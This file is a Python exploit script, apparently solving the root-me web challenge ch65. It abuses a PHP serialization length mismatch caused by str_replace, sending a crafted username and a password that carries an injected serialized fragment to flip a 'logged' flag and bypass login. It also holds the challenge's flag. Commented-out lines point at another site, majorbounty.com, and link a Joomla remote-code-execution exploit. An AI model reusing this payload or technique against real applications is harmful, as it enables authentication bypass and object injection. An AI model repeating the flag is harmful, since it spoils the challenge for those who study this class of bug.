- import requests
# Browser-like request headers reused for every request (values as in the paste).
headers = {
    'Accept-language': 'en-US,en;q=0.9,vi;q=0.8',
    'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36',
}
# Target: root-me "web-serveur" challenge ch65, reached over plain HTTP.
url = 'http://challenge01.root-me.org/web-serveur/ch65/'
# url = 'http://majorbounty.com/'
## str_replace(search , result_search, input)
# Author's working notes, kept verbatim as bare string statements (no-ops at
# runtime). They describe the server-side defect as the author understood it:
# str_replace() is applied to an already-serialized PHP string and swaps a
# 3-byte token for a 6-byte one, so the s:N: length prefixes no longer match
# the data that follows them.
# NOTE(review): none of this is verifiable from this file; it reflects the
# author's reading of the challenge. Mitigation on the server side: do not
# post-process serialized blobs with string functions, and do not call
# unserialize() on data a user can influence (a structured format such as
# JSON with explicit validation avoids the length-prefix problem entirely).
'''vuln
chr(0) . '*' . chr(0) => len == 3
'\0\0\0' => len == 6
str_replace(chr(0) . '*' . chr(0), '\0\0\0', $serialized_value);
username=guest;pass=guest
O:4:"User":4:{s:12:"*_username";s:5:"guest";s:12:"*_password";s:5:"guest";s:10:"*_logged";b:0;s:9:"*_email";s:0:"";}
O:4:"User":4:{s:12:"\0\0\0_username";s:5:"guest";s:12:"\0\0\0_password";s:5:"guest";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
wrong with php
=> need overflow the logged value....
O:4:"User":4:{s:12:"\0\0\0_username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:12:"\0\0\0_password";s:XX:"";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
O:4:"User":4:{s:12:"\0\0\0_username";s:54:" * * * * * * * * * ";s:12:" * _password";s:XX:"";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
| |
O:4:"User":4:{s:12:"\0\0\0_username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:12:"\0\0\0_password";s:55:";s:12:"\0\0\0_password";s:0:"";s:10:"\0\0\0_logged";b:1;s:9:"\0\0\0_email";s:0:"";}
'''
'''
(in database)
s:8:s:"username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:8:"password";s:10:"MYPASSWORD"
(after read and replace)
s:8:s:"username";s:54:"NNNNNNNNNNNNNNNNNNNNNNNNNNN";s:8:"password";s:10:"MYPASSWORD"
(Achieve Object injection):
s:8:s:"username";s:54:"NNNNNNNNNNNNNNNNNNNNNNNNNNN";s:8:"password";s:10:"MYPA";s:2:"HS":O:15:"ObjectInjection"
'''
class Hacker:
    """HTTP client for the challenge at the module-level ``url``.

    Holds one ``requests`` Session so that cookies set by the login response
    are carried into the follow-up GET. Reads the module-level ``url`` and
    ``headers`` defined above.
    """

    def __init__(self):
        # Target and headers come from module scope. Both are stored on the
        # instance, but login() below reads the module globals instead.
        self.url = url
        self.requests_session = requests.session()
        self.headers=headers
        # No proxy by default. The commented line points at a local
        # intercepting proxy on 127.0.0.1:8080, presumably used to inspect
        # the traffic while developing the script.
        self.proxies = None
        # self.proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}

    def login(self):# \\0\\0
        """POST the login form with the crafted username/password pair.

        The username is 27 repetitions of the two characters backslash and
        zero (54 characters in total, not NUL bytes), matching the s:54:
        length in the notes at the top of the file. The password field
        carries the serialized fragment described in those notes. Nothing
        is returned; the Session keeps whatever cookies the server sets.
        """
        ## http://majorbounty.com/
        ## joomla rusty rce
        ## https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41
        ## https://github.com/kiks7/rusty_joomla_rce
        ## +'";s:10:"\\0\\0\\0_logged";b:1;s:9:" * _email";s:0:"";}//'
        # data = {'username':'\\0'*27,'password':';s:12:"\\0\\0\\0_password";s:0:"";s:10:"\\0\\0\\0_logged";b:1;s:9:"\\0\\0\\0_email";s:0:"";}//','submit':'login'}
        data = {'username':'\\0'*27,'password':';s:12:"\\0\\0\\0_password";s:0:"";s:10:"\\0\\0\\0_logged";b:1;s:9:"\\0\\0\\0_email";s:0:"";}','submit':'login'}
        # data = {'username':'\\0'*27,'password':';s:12:"\\0\\0\\0_password";s:1:"a";s:10:"\\0\\0\\0_logged";b:1;s:9:"\\0\\0\\0_email";s:44:','submit':'login'}
        # NOTE(review): uses the module-level url/headers rather than
        # self.url/self.headers set in __init__, so the two can drift apart.
        # verify=False disables TLS certificate checking; it is moot for this
        # http:// URL but becomes a real weakness if the target changes.
        resp = self.requests_session.request("POST",url,data=data,headers=headers,proxies=self.proxies,verify=False)
        # Dead code: the joined Cookie header is never applied (the next line
        # is commented out). The Session object already stores the response
        # cookies, which is what get_cookie() relies on.
        Cookie = ';'.join([f'{value.name}={value.value}' for value in resp.cookies])#+';user='
        # self.headers['cookie']= Cookie

    def get_cookie(self):
        """GET the page using the Session cookies from login() and print the body."""
        resp = self.requests_session.request("GET",url,headers=self.headers,proxies=self.proxies,verify=False)
        # if b'you are logged in! congratz, the flag is: ' in resp.content:print(resp.content);input()
        print(resp.content)#;input()
## B3Carrefull-w1th_Unseri4l1ze
if __name__=='__main__':
    # Both steps run on the same client so the Session cookies carry over.
    client = Hacker()
    for step in (client.login, client.get_cookie):
        step()